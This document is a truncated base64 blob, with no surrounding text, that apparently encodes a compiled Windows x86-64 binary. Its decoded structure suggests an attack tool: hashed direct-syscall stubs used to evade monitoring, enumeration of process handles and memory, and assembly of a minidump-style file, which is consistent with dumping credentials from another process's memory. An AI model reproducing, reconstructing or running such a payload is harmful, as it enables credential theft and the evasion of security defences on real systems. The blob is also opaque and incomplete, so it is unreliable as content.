EyJRCQYTIlMJCBIx8GPLFtKUUiD7Cjo3fr//0iDxChZUEiD7Cjocvr//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuROkv5wAAAAAUUiD7Cjog/r//0iDxChZUEiD7CjoGPr//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8FP9iMOUUiD7CjoLPr//0iDxChZUEiD7Cjowfn//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8HjdmNCUUiD7Cjo1fn//0iDxChZUEiD7Cjoavn//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EaarJkUUiD7Cjofvn//0iDxChZUEiD7CjoE/n//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8GgZC5lUUiD7CjoJ/n//0iDxChZUEiD7CjovPj//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EMMp8dUUiD7Cjo0Pj//0iDxChZUEiD7CjoZfj//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8E2cZEnUUiD7Cjoefj//0iDxChZUEiD7CjoDvj//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8GEg5wJUUiD7CjoIvj//0iDxChZUEiD7Cjot/f//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8GHX74aUUiD7Cjoy/f//0iDxChZUEiD7CjoYPf//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuepivbwAAAAAUUiD7Cjocff//0iDxChZUEiD7CjoBvf//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuW260YoAAAAAUUiD7CjoF/f//0iDxChZUEiD7CjorPb//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuQ+Yl4wAAAAAUUiD7Cjovfb//0iDxChZUEiD7CjoUvb//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuaeMOqYAAAAAUUiD7CjoY/b//0iDxChZUEiD7Cjo+PX//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIufkSafAAAAAAUUiD7CjoCfb//0iDxChZUEiD7CjonvX//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EYOaNzUUiD7CjosvX//0iDxChZUEiD7CjoR/X//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8H7Xqt8UUiD7CjoW/X//0iDxChZUEiD7Cjo8PT//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIx8EeXJg4UUiD7CjoBPX//0iDxChZUEiD7CjomfT//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LSIlMJAhIiVQkEEyJRCQYTIlMJCBIuYJN34QAAAAAUUiD7CjoqvT//0iDxChZUEiD7CjoP/T//0iDxChBW0iLTCQISItUJBBMi0QkGEyLTCQgSYnKQf/jkA8LkJCQkJCQkJCQVUiJ5UiD7DBIiU0QSIlVGEyJRSBMiU0oSI1FIEiJRfBIi1XwSItFGEmJ0EiJwkiLTRDoCU8AAIlF/ItF/EiDxDBdw1VIieVIg+wwx0X8AQAAAEiNBcfAAABIiUXwSI1F8EG4AQAAALoBAAAASInB6AwAAACJRfyLRfxIg8QwXcNVU0iD7EhIjWwkQEiJTSCJVShEiUUwSMdF6AAAAABIjUXoSYnAuigAAABIx8H/////6Jz1//+JRfiDffgAeQq4AAAAAOnWAAAAx0X8AAAAAOmlAAAAi0X8SJhIjRTFAAAAAEiLRSBIAdBIixBIi0Xoi00wQYnISInB6KgAAACJRfSDffQAdW9Ii0XoSInB6Oj0//9Ix0XoAAAAAItF/EiYSI0UxQAAAABIi0UgSAHQSIsYuQEAAABIiwXSrQAA/9BJidhIjRX4vwAASInB6K7+//+5AQAAAEiLBbKtAAD/0EiNFfe/AABIicHokf7//7gAAAAA6ymDRfwBi0X8OUUoD4dP////SItF6EiJwehp9P//SMdF6AAAAAC4AQAAAEiDxEhbXcNVU0iB7IgAAABIjawkgAAAAEiJTSBIiVUoRIlFMMdF/AAAAADHRdAIAAAAx0X4AAAAAMdFzAAAAABIx0XwAAAAAEjHRcAAAAAAx0XIAAAAAEjHRbAAAAAASMdFuAAAAABIx0XoAAAAAMdF5AEAAMC6AQAAAEiNDT+/AADo4cX//0G4AAAAALoewaURSInB6PjD//9IiUXYSIN92AAPhDYCAACLRdCJw0iLBVguAQD/0EmJ2LoIAAAASInBSIsFVC4BAP/QSIlF8EiDffAAD4QIAgAAi03QSItV8EiNRdBIiUQkIEGJyUmJ0LoDAAAASItNIOg0+f//iUXkg33kAHk4SIsF/y0BAP/QSItV8EmJ0LoAAAAASInBSIsF/y0BAP/QSMdF8AAAAACBfeQjAADAD4Rs////6wGQg33kAA+ImwEAAMdF+AAAAADpeAEAAEiLTfCLVfhIidBIAcBIAdBIweACSAHISItQBEiJVcCLQAyJRcjHRcwAAAAASI1VzEiNRcBMi1XYSYnRQbgAAAAASInCuQAAAABB/9KJRdSDfdQAD4U5AQAASIsFTy0BAP/Qg/h6D4UnAQAAi0XMg8ABiUXMi0XMicBIjRwASIsFMy0BAP/QSYnYuggAAABIicFIiwUvLQEA/9BIiUXoSIN96AAPhOwAAABIjU3MSItV6EiNRcBMi1XYSYnJSYnQSInCuQAAAABB/9KJRdSDfdQAD4TBAAAASItVKEiLRehIicFIiwXeLQEA/9CFwHVcg30wAHRMx0WwAQAAAEiLRcBIiUW0x0W8AgAAAEiNRbBIx0QkKAAAAABIx0QkIAAAAABBuRAAAABJicC6AAAAAEiLTSDoMPP//4lF5IN95AB4WsdF/AEAAACQ61FIiwVlLAEA/9BIi1XoSYnQugAAAABIicFIiwVlLAEA/9BIx0XoAAAAAINF+AFIi0XwiwA5RfgPgnn+///rE5DrEJDrDZDrCpDrB5DrBJDrAZBIg33wAHQhSIsFDSwBAP/QSItV8EmJ0LoAAAAASInBSIsFDSwBAP/QSIN96AB0IUiLBeUrAQD/0EiLVehJidC6AAAAAEiJwUiLBeUrAQD/0ItF/EiBxIgAAABbXcOQkFVIieVIg+wwSIlNEEiJVRhMiUUgTIlNKEiNRSBIiUXwSItV8EiLRRhJidBIicJIi00Q6BlKAACJRfyLRfxIg8QwXcNVSInlSIPsUIlNEEiLBWcrAQD/0EG4iDgBALoIAAAASInBSIsFYCsBAP/QSIlF8EiDffAAdQq4AAAAAOkWAgAAx0XUAAAAAEiNRdRIicHoB9v//4lF7IN97AB1M0iLBRYrAQD/0EiLVfBJidC6AAAAAEiJwUiLBRYrAQD/0EjHRfAAAAAAuAAAAADpxwEAAOhq1///SIlF4EiDfeAAdTNIiwXTKgEA/9BIi1XwSYnQugAAAABIicFIiwXTKgEA/9BIx0XwAAAAALgAAAAA6YQBAADHRfwAAAAA6TwBAACLVfxIidBIAcBIAdBIweADSItV4EgB0EiDwAhIiUXYSItF2A+3AA+3wDlFEA+F/wAAAEiLRdiLQBAlEAQAAD0QBAAAD4XrAAAASItF2A+2QAQPttCLRdQ5wg+F2AAAAEiLRfCLAIPAAT0QJwAAD4aTAAAAuQEAAABIiwWAqAAA/9BIjRXnugAASInB6E/+//+5AQAAAEiLBWOoAAD/0EiNFfi6AABIicHoMv7//0iLBecpAQD/0EiLVeBJidC6AAAAAEiJwUiLBecpAQD/0EjHReAAAAAASIsFvikBAP/QSItV8EmJ0LoAAAAASInBSIsFvikBAP/QSMdF8AAAAAC4AAAAAOtySItF2A+3QAZED7fASItF8IsQjUoBSItF8IkITInBSItF8InSSIlM0AjrB5DrBJDrAZCDRfwBSItF4IsAOUX8D4K1/v//SIsFSSkBAP/QSItV4EmJ0LoAAAAASInBSIsFSSkBAP/QSMdF4AAAAABIi0XwSIPEUF3DVUiJ5UiD7DCJTRBIiVUYx0XsQAAAAItF7GVIiwBIiUXgSItF4IlF/EiDfRgAdAlIi0UYi1X8iRDHRdwwAAAAi0XcZUiLAEiJRdBIi0XQSIPAQEiJRfBIi0Xwi1UQiRCQSIPEMF3DVUiB7EAEAABIjawkgAAAAImN0AMAAEiJldgDAABMiYXgAwAATImN6AMAAEiLleADAABIjYWwAQAAQbgEAQAASInB6LScAABIi4XYAwAAQbgEAQAASI0VYLkAAEiJwegYnQAASI2VsAEAAEiLhdgDAABBuAQBAABIicHo9JwAAEiLhdgDAABBuAQBAABIjRUouQAASInB6NicAACDvdADAAAAD4T3AAAASIuV6AMAAEiNRaBBuAQBAABIicHoOpwAAEiLhdgDAABBuAQBAABIjRXquAAASInB6JacAABIjVWgSIuF2AMAAEG4BAEAAEiJweh9nAAAg73wAwAAAHQcSIuF2AMAAEG4BAEAAEiNFba4AABIicHoWJwAAIO9+AMAAAB0HEiLhdgDAABBuAQBAABIjRWZuAAASInB6DOcAACDvQAEAAAAdBxIi4XYAwAAQbgEAQAASI0VfLgAAEiJwegOnAAASIuF2AMAAEG4BAEAAEiNFWi4AABIicHo8psAAEiLhdgDAABBuAQBAABIjRVUuAAASInB6NabAADrAZBIgcRABAAAXcNVSInlSIPsIEiJTRCJVRhIg30QAHUHuAEAAADrckiLRRCLAIPAAT2IEwAAdkG5AQAAAEiLBTmlAAD/0EiNFRi4AABIicHoCPv//7kBAAAASIsFHKUAAP/QSI0VsbcAAEiJwejr+v//uAAAAADrIUiLRRCLEI1KAUiLRRCJCEiLRRCJ0YtVGIlUiAS4AQAAAEiDxCBdw1VIieVIg+wwiU0QSIlVGEG4AAAAALoAABAAi00Q6JbR//9IiUX4SIN9+AB1B7gAAAAA60xIi0X4SInB6DPL//+JRfSDffQAdQe4AAAAAOswSItF+EiJwehs6///SMdF+AAAAABIi0UYSInB6OXF//+FwHUHuAAAAADrBbgBAAAASIPEMF3DVUiJ5UiD7DBIiU0QSIN9EAB0McdF/AAAAADrG0iLRRCLVfyLRJAEugAAAACJwegtzv//g0X8AUiLRRCLADlF/HLa6wGQSIPEMF3DVUiJ5UiD7FBIiU0QSIlVGESJRSBEiU0oSMdF+AAAAACDfTgAdUBIiwV7JQEA/9BBuCROAAC6CAAAAEiJwUiLBXQlAQD/0EiJRfhIg334AHUVSItFSEjHAAAAAAC4AAAAAOnrAAAASItFSEiLVfhIiRBEi0Uoi00gSItFGEiLVfhIiVQkOItVQIlUJDCLVTiJVCQoi1UwiVQkIEWJwUGJyEiJwkiLTRDoqwAAAIlF9IN99AB1fLkBAAAASIsFS6MAAP/QSI0VXLYAAEiJwega+f//uQEAAABIiwUuowAA/9BIjRXDtQAASInB6P34//9Ig334AHQ0SIsFqyQBAP/QSItV+EmJ0LoAAAAASInBSIsFqyQBAP/QSMdF+AAAAABIi0VISMcAAAAAALgAAAAA6yCDfTgAdBWLVTBIi0UYQbgBAAAASInB6JHJ//+4AQAAAEiDxFBdw1VIgewwBQAASI2sJIAAAABIiY3ABAAASImVyAQAAESJhdAEAABEiY3YBAAASIuFyAQAAEiJwejyw///hcB0HUiLhcgEAABIicHo0sL//4XAdQq4AAAAAOl9BAAATIuFyAQAAEiNlYACAACLhegEAACLjeAEAACJTCQwi43YBAAAiUwkKIuN0AQAAIlMJCBNicFMi4XABAAAicHo+/r//4uF8AQAAInB6Cz4//9IiYWgBAAASIO9oAQAAAB1CrgAAAAA6RIEAABIi4WgBAAAiwCFwHV8uQEAAABIiwXVoQAA/9CLlfAEAABBidBIjRX7tAAASInB6Jv3//+5AQAAAEiLBa+hAAD/0EiNFUS0AABIicHofvf//0iLBTMjAQD/0EiLlaAEAABJidC6AAAAAEiJwUiLBTAjAQD/0EjHhaAEAAAAAAAAuAAAAADpiQMAAEiNlXwCAACLhfAEAACJwejQ+f//SI1F4EG4BAEAAEiLlcAEAABIicHoGJcAALoBAAAASI0NmLQAAOgeuv//QbgAAAAAugUjqTlIicHoNbj//0iJhZgEAABIg72YBAAAAHU5SIsFmCIBAP/QSIuVoAQAAEmJ0LoAAAAASInBSIsFlSIBAP/QSMeFoAQAAAAAAAC4AAAAAOnuAgAAx4WsBAAAAAAAAOl0AgAASI2FYAIAAEG4GAAAALoAAAAASInB6JmWAABIjYXwAQAAQbhoAAAAugAAAABIicHof5YAAMeFLAIAAAABAACLlawEAACNQgGJhawEAABIi4WgBAAAidJIi0TQCEiJhUACAABIi4WgBAAAiwA5hawEAABzJIuVrAQAAI1CAYmFrAQAAEiLhaAEAACJ0kiLRNAISImFSAIAAEiLhaAEAACLADmFrAQAAHMki5WsBAAAjUIBiYWsBAAASIuFoAQAAInSSItE0AhIiYVQAgAASI2FYAIAAEiJRCRQSI2F8AEAAEiJRCRISMdEJEAAAAAASMdEJDgAAAAAx0QkMAAAAABIjYWAAgAASIlEJChIjUXgSIlEJCBIi4WYBAAAQbkCAAAATI0FGrMAAEiNFSuzAABIjQ1CswAA/9CJhZQEAACDvZQEAAAAdUuLhXwCAAC6AAAAAInB6OL3//9IiwX4IAEA/9BIi5WgBAAASYnQugAAAABIicFIiwX1IAEA/9BIx4WgBAAAAAAAALgAAAAA6U4BAACLlXACAABIi4X4BAAASInB6KP5//+JhZQEAACDvZQEAAAAdUuLhXwCAAC6AAAAAInB6HP3//9IiwWJIAEA/9BIi5WgBAAASYnQugAAAABIicFIiwWGIAEA/9BIx4WgBAAAAAAAALgAAAAA6d8AAACDvegEAAAAdGuLhXACAABIi5XIBAAAicHowfn//4mFlAQAAIO9lAQAAAB0SIuFfAIAALoAAAAAicHo/Pb//0iLBRIgAQD/0EiLlaAEAABJidC6AAAAAEiJwUiLBQ8gAQD/0EjHhaAEAAAAAAAAuAEAAADra0iLhaAEAACLADmFrAQAAA+Cd/3//4uFfAIAALoAAAAAicHon/b//0iLBbUfAQD/0EiLlaAEAABJidC6AAAAAEiJwUiLBbIfAQD/0EjHhaAEAAAAAAAAg73oBAAAAHQHuAAAAADrBbgBAAAASIHEMAUAAF3DVUiJ5UiD7EBIiU0QSItNEOg2v///hcB0B7gAAAAA61bHRfwAAAAASMdF8AAAAADHRewEAAAA6zSDffwAdQ+LRexIicHoVMb//4XAdQ2LRexIicHoZuT//+sOi0XsSIlF8MdF/AEAAACDRewEg33sGHbGSItF8EiDxEBdw5CQkJCQkJBVSInlSIPsMEiJTRBIiVUYTIlFIEyJTShIjUUgSIlF8EiLVfBIi0UYSYnQSInCSItNEOhJPQAAiUX8i0X8SIPEMF3DVUiJ5UiD7DBIiU0QiVUYTIlFIESJTShIi0UQSItACEiJwotFGEgB0EiJRfiLTShIi1UgSItF+EmJyEiJwei7kgAAkEiDxDBdw1VIieVIg+wwSIlNEEiJVRhEiUUgSItFEItQEItFIAHQiUX8SItFEItAEDlF/HNBuQEAAABIiwWJnAAA/9BIjRVgsAAASInB6Cj///+5AQAAAEiLBWycAAD/0EiNFXOwAABIicHoC////7gAAAAA63+LVfxIi0UQSItAGEg5wnJBuQEAAABIiwU4nAAA/9BIjRVHsAAASInB6Nf+//+5AQAAAEiLBRucAAD/0EiNFSKwAABIicHouv7//7gAAAAA6y5Ii0UQi0AQi00gSItVGEGJyUmJ0InCSItNEOjX/v//SItFEItV/IlQELgBAAAASIPEMF3DVUiJ5UiD7HBIiU0QSMdF0AAAAABIx0XYAAAAAEjHReAAAAAASMdF6AAAAABIi0UQi0AgiUXQSItFEA+3QCRmiUXUSItFEA+3QCZmiUXWx0XYAwAAAMdF3CAAAADHReAAAAAAx0XkAAAAAMdF6AAAAADHRewAAAAASMdFsAAAAABIx0W4AAAAAEjHRcAAAAAASMdFyAAAAADHRfwAAAAAi0X8SI1VsEgBwotF0IkCg0X8BItF/EiNVbBIAcIPt0XUZokCg0X8AotF/EiNVbBIAcIPt0XWZokCg0X8AotF/EiNVbBIAcKLRdiJAoNF/ASLRfxIjVWwSAHCi0XciQKDRfwEi0X8SI1VsEgBwotF4IkCg0X8BItF/EiNVbBIAcKLReSJAoNF/ASLRfxIjVWwSAHCi0XoiQKDRfwEi0X8SI1VsEgBwotF7IkCSI1FsEG4IAAAAEiJwkiLTRDoq/3//4XAdQe4AAAAAOsFuAEAAABIg8RwXcNVU0iD7DhIjWwkMEiJTSBIidNIx0XwAAAAAMdF+AAAAADHRfwAAAAAi0X8SI1V8EgBwosDiQKDRfwEi0X8SI1V8EgBwotDBIkCg0X8BItF/EiNVfBIAcKLQwiJAkiNRfBBuAwAAABIicJIi00g6CP9//+FwHUHuAAAAADrBbgBAAAASIPEOFtdw1VIieVIg+xgSIlNEEjHRfQAAAAAx0X8AAAAAMdF9AcAAADHRfgAAAAAx0X8AAAAAEiLRfRIiUXAi0X8iUXISI1FwEiJwkiLTRDoKf///4XAdQq4AAAAAOmfAAAASMdF6AAAAADHRfAAAAAAx0XoBAAAAMdF7AAAAADHRfAAAAAASItF6EiJRcCLRfCJRchIjUXASInCSItNEOjZ/v//hcB1B7gAAAAA61JIx0XcAAAAAMdF5AAAAADHRdwJAAAAx0XgAAAAAMdF5AAAAABIi0XcSIlFwItF5IlFyEiNRcBIicJIi00Q6Iz+//+FwHUHuAAAAADrBbgBAAAASIPEYF3DVUiJ5UiB7OAAAABIiU0QSMdFkAAAAABIx0WYAAAAAEjHRaAAAAAASMdFqAAAAABIx0WwAAAAAEjHRbgAAAAAx0XIYAAAAItFyGVIiwBIiUXASItFwEiJRfhIi0X4SAUYAQAASIlF8EiLRfhIBRwBAABIiUXoSItF+EgFIAEAAEiJReBIi0X4SAUkAQAASIlF2EiLRfhIBegCAABIiUXQZsdFkAkAZsdFkgAAZsdFlAAAxkWWAMZFlwFIi0XwiwCJRZhIi0XoiwCJRZxIi0XgD7cAD7fAiUWgSItF2IsAiUWkx0WoAAAAAGbHRawAAGbHRa4AAEjHRbAAAAAASMdFuAAAAADHRYwwAAAASMeFUP///wAAAABIx4VY////AAAAAEjHhWD///8AAAAASMeFaP///wAAAABIx4Vw////AAAAAEjHhXj///8AAAAAx0XMAAAAAItFzEiNlVD///9IAcIPt0WQZokCg0XMAotFzEiNlVD///9IAcIPt0WSZokCg0XMAotFzEiNlVD///9IAcIPt0WUZokCg0XMAotFzEiNlVD///9IAcIPtkWWiAKDRcwBi0XMSI2VUP///0gBwg+2RZeIAoNFzAGLRcxIjZVQ////SAHCi0WYiQKDRcwEi0XMSI2VUP///0gBwotFnIkCg0XMBItFzEiNlVD///9IAcKLRaCJAoNFzASLRcxIjZVQ////SAHCi0WkiQKDRcwEi0XMSI2VUP///0gBwotFqIkCg0XMBItFzEiNlVD///9IAcIPt0WsZokCg0XMAotFzEiNlVD///9IAcIPt0WuZokCg0XMAotFzEiNlVD///9IAcJIi0WwSIkCg0XMCItFzEiNlVD///9IAcJIi0W4SIkCSItFEItAEImFTP///4tVjEiNhVD///9BidBIicJIi00Q6FH5//+FwHUKuAAAAADpzwAAAEiNRYxBuQQAAABJicC6JAAAAEiLTRDo3/j//0iNhUz///9BuQQAAABJicC6KAAAAEiLTRDowfj//0iLRRCLQBCJhUj///9Ii0XQD7cAD7fAiYVE////SI2FRP///0G4BAAAAEiJwkiLTRDo1Pj//4XAdQe4AAAAAOtVSItF0A+3AA+30EiLRdBIi0AIQYnQSInCSItNEOio+P//hcB1B7gAAAAA6ymLhUz///+DwBhIjZVI////QbkEAAAASYnQicJIi00Q6DD4//+4AQAAAEiBxOAAAABdw1VXSIHs2AEAAEiNrCSAAAAASImNcAEAAEiNBVypAABIiYWgAAAASI0FZKkAAEiJhagAAABIjQVsqQAASImFsAAAAEiNBXKpAABIiYW4AAAASI0FfKkAAEiJhcAAAABIjQWIqQAASImFyAAAAEiNBZKpAABIiYXQAAAASI0FnqkAAEiJhdgAAABIjQWmqQAASImF4AAAAEiNBbKpAABIiYXoAAAASI0FuKkAAEiJhfAAAABIjQXAqQAASImF+AAAAEiNBcipAABIiYUAAQAASI0F0KkAAEiJhQgBAABIjQXgqQAASImFEAEAAEiNBeypAABIiYUYAQAASI0F9qkAAEiJhSABAABIjQUAqgAASImFKAEAAEiLhXABAABIiwBIjZWgAAAAQbkBAAAAQbgSAAAASInB6C7Q//9IiYVAAQAASIO9QAEAAAB1CrgAAAAA6e0FAABIi4VAAQAASImFSAEAAMeFnAAAAAAAAADp7AAAAIuFnAAAAIPAAYmFnAAAAEiLhXABAACLUBBIi4VIAQAAiZAUAQAASIuFSAEAAEiDwBS6AAEAAEiJweiAMwAAiUUYi0UYg8ABiUUYi0UYAcCJRRhIjUUYQbgEAAAASInCSIuNcAEAAOiP9v//hcB1JEiLhUABAABIicHo47b//0jHhUABAAAAAAAAuAAAAADpPQUAAItVGEiLhUgBAABIg8AUQYnQSInCSIuNcAEAAOhH9v//hcB1JEiLhUABAABIicHom7b//0jHhUABAAAAAAAAuAAAAADp9QQAAEiLhUgBAABIiwBIiYVIAQAASIO9SAEAAAAPhQb///9Ii4VwAQAAi0AQiYWYAAAASI2FnAAAAEG4BAAAAEiJwkiLjXABAADo1PX//4XAdSRIi4VAAQAASInB6Ci2//9Ix4VAAQAAAAAAALgAAAAA6YIEAABIx0UgAAAAAEjHRSgAAAAASMdFMAAAAABIx0U4AAAAAEjHRUAAAAAASMdFSAAAAABIx0VQAAAAAEjHRVgAAAAASMdFYAAAAABIx0VoAAAAAEjHRXAAAAAASMdFeAAAAABIx4WAAAAAAAAAAMeFiAAAAAAAAABIi4VAAQAASImFSAEAAOmXAwAASI1VoLgAAAAAuQ4AAABIidfzSKtIi4VIAQAASItACEiJRaBIi4VIAQAAi0AQiUWoSIuFSAEAAIuAHAEAAIlFrEiLhUgBAACLgBgBAACJRbBIi4VIAQAAi4AUAQAAiUW0x0W4AAAAAMdFvAAAAADHRcAAAAAAx0XEAAAAAMdFyAAAAADHRcwAAAAAx0XQAAAAAMdF1AAAAADHRdgAAAAAx0XcAAAAAMdF4AAAAADHReQAAAAAx0XoAAAAAMdF7AAAAADHRfAAAAAAx0X0AAAAAMdF+AAAAABIx0UAAAAAAEjHRQgAAAAAx4U8AQAAAAAAAIuFPAEAAEiNVSBIAcJIi0WgSIkCg4U8AQAACIuFPAEAAEiNVSBIAcKLRaiJAoOFPAEAAASLhTwBAABIjVUgSAHCi0WsiQKDhTwBAAAEi4U8AQAASI1VIEgBwotFsIkCg4U8AQAABIuFPAEAAEiNVSBIAcKLRbSJAoOFPAEAAASLhTwBAABIjVUgSAHCi0W4iQKDhTwBAAAEi4U8AQAASI1VIEgBwotFvIkCg4U8AQAABIuFPAEAAEiNVSBIAcKLRcCJAoOFPAEAAASLhTwBAABIjVUgSAHCi0XEiQKDhTwBAAAEi4U8AQAASI1VIEgBwotFyIkCg4U8AQAABIuFPAEAAEiNVSBIAcKLRcyJAoOFPAEAAASLhTwBAABIjVUgSAHCi0XQiQKDhTwBAAAEi4U8AQAASI1VIEgBwotF1IkCg4U8AQAABIuFPAEAAEiNVSBIAcKLRdiJAoOFPAEAAASLhTwBAABIjVUgSAHCi0XciQKDhTwBAAAEi4U8AQAASI1VIEgBwotF4IkCg4U8AQAABIuFPAEAAEiNVSBIAcKLReSJAoOFPAEAAASLhTwBAABIjVUgSAHCi0XoiQKDhTwBAAAEi4U8AQAASI1VIEgBwotF7IkCg4U8AQAABIuFPAEAAEiNVSBIAcKLRfCJAoOFPAEAAASLhTwBAABIjVUgSAHCi0X0iQKDhTwBAAAEi4U8AQAASI1VIEgBwotF+IkCg4U8AQAABIuFPAEAAEiNVSBIAcJIi0UASIkCg4U8AQAACIuFPAEAAEiNVSBIAcJIi0UISIkCSI1FIEG4bAAAAEiJwkiLjXABAADow/H//4XAdSFIi4VAAQAASInB6Bey//9Ix4VAAQAAAAAAALgAAAAA63RIi4VIAQAASIsASImFSAEAAEiDvUgBAAAAD4Vb/P//i4WcAAAAa8Bsg8AEiUUcSI1FHEG5BAAAAEmJwLowAAAASIuNcAEAAOgJ8f//SI2FmAAAAEG5BAAAAEmJwLo0AAAASIuNcAEAAOjo8P//SIuFQAEAAEiBxNgBAABfXcNVSInlSIPsEEiJTRBIiVUYSItFGEiJRfjrQEiLRfhIi1AISItFEEg5wnckSItF+EiLUAhIi0X4i0AQicBIAcJIi0UQSDnCdge4AQAAAOsXSItF+EiLAEiJRfhIg334AHW5uAAAAABIg8QQXcNVSInlSIHsoAAAAEiJTRBIiVUYSMdF+AAAAABIx0XwAAAAAMdF3AAAAABIx0WQAAAAAEjHRZgAAAAASMdFoAAAAABIx0WoAAAAAEjHRbAAAAAASMdFuAAAAADHRewAAAAASItFEEiLAEyNRZCLTdxIi1XwSMdEJCgAAAAASMdEJCAwAAAATYnBQYnISInB6NvU//+JRdiDfdgAD4iBAQAASItFkEiJRdBIi0WoSIlFyEiLVdBIi0XISAHCSItF0Eg5wg+CXAEAAEiLVdBIi0XISAHQSIlF8ItFsD0AEAAAD4UYAQAAi0W4PQAABAAPhBABAACLRbSD4AGFwA+FCAEAAItFtCUAAQAAhcAPhf4AAACLRbSD4BCFwA+F9gAAAItFuD0AAAABdRhIi1UYSItF0EiJwehb/v//hcAPhNoAAABIiwXMDQEA/9BBuCgAAAC6CAAAAEiJwUiLBcUNAQD/0EiJRcBIg33AAHUKuAAAAADpwQAAAEiLRcBIxwAAAAAASItV0EiLRcBIiVAISItFwEiLVchIiVAQi1WwSItFwIlQGItVtEiLRcCJUByLVbhIi0XAiVAgSIN9+AB1CkiLRcBIiUX46yxIi0X4SIlF4OsLSItF4EiLAEiJReBIi0XgSIsASIXAdelIi0XgSItVwEiJEINF7AHpZP7//5DpXv7//5DpWP7//5DpUv7//5DpTP7//5DpRv7//5DpQP7//5DrAZBIg334AHUHuAAAAADrBEiLRfhIgcSgAAAAXcNVU0iD7HhIjWwkcEiJTSBIiVUoSItFIItAEIlF4EiLRShIicJIi00g6JP9//9IiUXwSIN98AB1CrgAAAAA6dYCAABIi0XwSIlF+EjHRdgAAAAA6xdIi0XYSIPAAUiJRdhIi0X4SIsASIlF+EiDffgAdeJIjUXYQbgIAAAASInCSItNIOjs7f//hcB1HkiLRfBIicHoQ67//0jHRfAAAAAAuAAAAADpbgIAAEiLRdhIg8ABweAEiUXUi0XgicKLRdSJwEgB0EiJRchIjUXIQbgIAAAASInCSItNIOiV7f//hcB1HkiLRfBIicHo7K3//0jHRfAAAAAAuAAAAADpFwIAAEiLRfBIiUX46YMAAABIi0X4SIPACEG4CAAAAEiJwkiLTSDoTO3//4XAdR5Ii0XwSInB6KOt//9Ix0XwAAAAALgAAAAA6c4BAABIi0X4SIPAEEG4CAAAAEiJwkiLTSDoEO3//4XAdR5Ii0XwSInB6Get//9Ix0XwAAAAALgAAAAA6ZIBAABIi0X4SIsASIlF+EiDffgAD4Vy////SI1F1EG5BAAAAEmJwLo8AAAASItNIOh07P//SI1F4EG5BAAAAEmJwLpAAAAASItNIOhZ7P//SItF8EiJRfjpKgEAAEiLRfhIi1gQSIsF5goBAP/QSYnYuggAAABIicFIiwXiCgEA/9BIiUXoSIN96AB1CrgAAAAA6f8AAABIi0X4SItIEEiLRfhIi0AISYnCSItFIEiLAEiLVehIx0QkIAAAAABJiclJidBMidJIicHoe8///4lF5EiLRfhIi0AQicJIi0XoQYnQSInCSItNIOgD7P//hcB1REiLRfBIicHoWqz//0jHRfAAAAAASIsFRAoBAP/QSItV6EmJ0LoAAAAASInBSIsFRAoBAP/QSMdF6AAAAAC4AAAAAOtfSItF+EiLUBBIi0XoSYnQugAAAABIicHoW34AAEiLBfgJAQD/0EiLVehJidC6AAAAAEiJwUiLBfgJAQD/0EjHRegAAAAASItF+EiLAEiJRfhIg334AA+Fy/7//0iLRfBIg8R4W13DVUiJ5UiD7DBIiU0QSItNEOg17P//hcB1CrgAAAAA6akAAABIi00Q6B3u//+FwHUKuAAAAADpkgAAAEiLTRDoB+///4XAdQe4AAAAAOt+SItNEOiT8v//SIlF+EiDffgAdQe4AAAAAOtjSItF+EiJwkiLTRDoaPz//0iJRfBIg33wAHUbSItF+EiJwegsq///SMdF+AAAAAC4AAAAAOstSItF+EiJwegRq///SMdF+AAAAABIi0XwSInB6P2q//9Ix0XwAAAAALgBAAAASIPEMF3DkJCQkJCQkFVIieVIg+wwSIlNEEiJVRhMiUUgTIlNKEiNRSBIiUXwSItV8EiLRRhJidBIicJIi00Q6DknAACJRfyLRfxIg8QwXcNVSInlSIPsIEiJTRC5AQAAAEiLBeWGAAD/0EyLRRBIjRXYnAAASInB6JD///+5AQAAAEiLBcSGAAD/0EiNFVSdAABIicHoc////7kBAAAASIsFp4YAAP/QSI0VOZ0AAEiJwehW////uQEAAABIiwWKhgAA/9BIjRUanQAASInB6Dn///+5AQAAAEiLBW2GAAD/0EiNFQydAABIicHoHP///7kBAAAASIsFUIYAAP/QSI0V4JwAAEiJwej//v/